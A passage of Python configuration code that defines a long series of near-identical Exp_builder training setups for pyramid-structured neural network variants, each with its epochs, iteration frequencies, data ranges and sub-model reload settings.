ch032_1side_7__2side_5__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_5_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s5__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_5_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_5_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s5__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_5_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_5_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s5__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_5_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_5_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s5__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_5_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_5_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s5__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_5_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_5_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s5__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_5_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_6_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_6_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s6__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_6_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_6_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_6_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s6__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_6_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_6_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_6_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s6__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_6_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_6_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_6_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s6__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_6_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_6_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_6_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s6__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_6_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_6_4side_6 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_6_4side_6_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s6__4s6") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_6_4side_6, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_5_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s5__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_5_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_5_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s5__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_5_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_5_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s5__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_5_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_5_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s5__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_5_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_5_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s5__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_5_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_6_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_6_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s6__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_6_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_6_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_6_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s6__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_6_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
